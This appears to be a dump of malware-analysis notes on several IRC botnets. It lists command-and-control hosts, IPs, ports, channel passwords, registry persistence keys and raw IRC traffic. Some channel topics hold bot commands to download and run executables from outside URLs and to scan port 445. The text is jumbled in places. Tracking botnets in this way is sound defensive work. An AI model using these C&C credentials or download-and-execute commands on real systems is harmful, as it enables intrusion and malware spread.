usb.123back.com

sb.123back.com 89.46.101.186 * C&C Server: 89.46.101.186:7000 * Server Password: * Username: bwkpfn * Nickname: rykrcm * Channel: #n8# (Password: trb123trb) * Channeltopic: : Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{2891BC5C0-4FCB-11cF-AAX5-81EX1F635612} “StubPath” = c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013is32.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel” File

us.123back.com

us.123back.com 89.46.101.186 * C&C Server: 89.46.101.186:6667 * Server Password: * Username: XP-9860 * Nickname: [DEU|00|P|20902] * Channel: #us# (Password: hiphop) * Channeltopic: :.nzel.start http://tamanjurong.sg/us9.exe C:iusw.exe 1 Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “WindowsXPP” = ¿›Û¥oginWindow.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “WindowsXPP” = ¿›Û¥oginWindow.exeHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:IM.exe” = c:IM.exe:*:Enabled:WindowsXPPHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active” =

java.KUTLUFAMILY.COM(ms0608 net)

java.KUTLUFAMILY.COM 67.159.9.24membres.lycos.fr membres.lycos.fr 213.131.252.251Download URLshttp://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) * C&C Server: 67.159.9.24:81 * Server Password: * Username: SP3-186 * Nickname: [N00_DEU_XP_8857119]xð@ * Channel: (Password: ) * Channeltopic: * C&C Server: 67.159.9.24:80 * Server Password: * Username: SP3-384 * Nickname: [00_DEU_XP_2207577] * Channel: #aa (Password: ) * Channeltopic: :.asc -S -s |.http http://94.76.194.116/aa.exe |.asc exp_all

lebanonbt.info(arab lamer 6k net)

{“lebanonbt.info”, 7000},{“lebanonbt.info”, 6667},{“lebanonbt.info”, 3211}, chanel:#lalachanelpass:trb123trbchanelusb:#usb

gs.unicatz.com

Remote Host Port Numbergs.unicatz.com 2010 00000000 | 4E49 434B 2058 505C 4E73 6533 5C0A 5553 | NICK XPNse3.US00000010 | 4552 206C 614D 6572 2022 2220 2267 732E | ER laMer “” “gs.00000020 | 756E 6963 6174 7A2E 636F 6D22 203A 0334 | unicatz.com” :.400000030 | B703 6CE0 0334 024D 0203 E972 0334 B720 | ..l..4.M…r.4.00000040

Server : i5387D082.versanet.de

Remote Host Port Number66.252.13.208 17000 NICK XP|Cah2USER laMer “” “flash.flassicensingservice.net” :You Think iaughtyUSERHOST XP|Cah2MODE XP|Cah2 +iJOIN #lbl# lamMODE #lbl#PONG :i5387D082.versanet.de Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallmIRC o HKEY_CURRENT_USERSoftwareMicrosoftMicrosoft Agent o HKEY_CURRENT_USERSoftwaremIRC o HKEY_CURRENT_USERSoftwaremIRCDateUsed * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + WinXPService = “%Windir%ie8mplayer.pif” so that mplayer.pif runs

remove.brooklyn-bitches.com (JiMyGJ the albanian lamer again)

i removed so that lamer cant harm people anymore here his infos remove.brooklyn-bitches.com 203.70.60.179 Opened listening TCP connection on port: 559 * C&C Server: 203.70.60.179:12351 * Server Password: * Username: rjrnz * Nickname: rjrnz * Channel: #.u (Password: 1980) * Channeltopic: here his real ip adressand his oper passwd oper JiM1 { from { userhost

bbs.moiservice.com

66.252.13.212:16667 Nick: [AUT]XP-SP3[00]7380Username: fmeslrJoined Channel: #l# with Password lamChannel Topic for Channel #l#: “.advscan asn445 120 5 0 -r -b -s”

us.unicatz.com

us.unicatz.com DNS_TYPE_A 66.252.13.214 1 66.252.13.214:2010 Nick: vnzznnscUsername: vnzznnscJoined Channel: #us# with Password d0s

b3.scorevidic.net

b3.scorevidic.net 92.243.29.231 * C&C Server: 92.243.29.231:5900 * Server Password: * Username: VirUs * Nickname: VirUs-bxyjsayd * Channel: (Password: ) * Channeltopic: Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{13POP6M8-1MAD-24AD-JIM1-73OP5G2223335} “StubPath” = c:JAMACRAFTpop.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”HKEY_CURRENT_USERSoftwareMicrosoftVisual Basic6.0 “AllowUnsafeObjectPassing”HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting “DoReport”HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting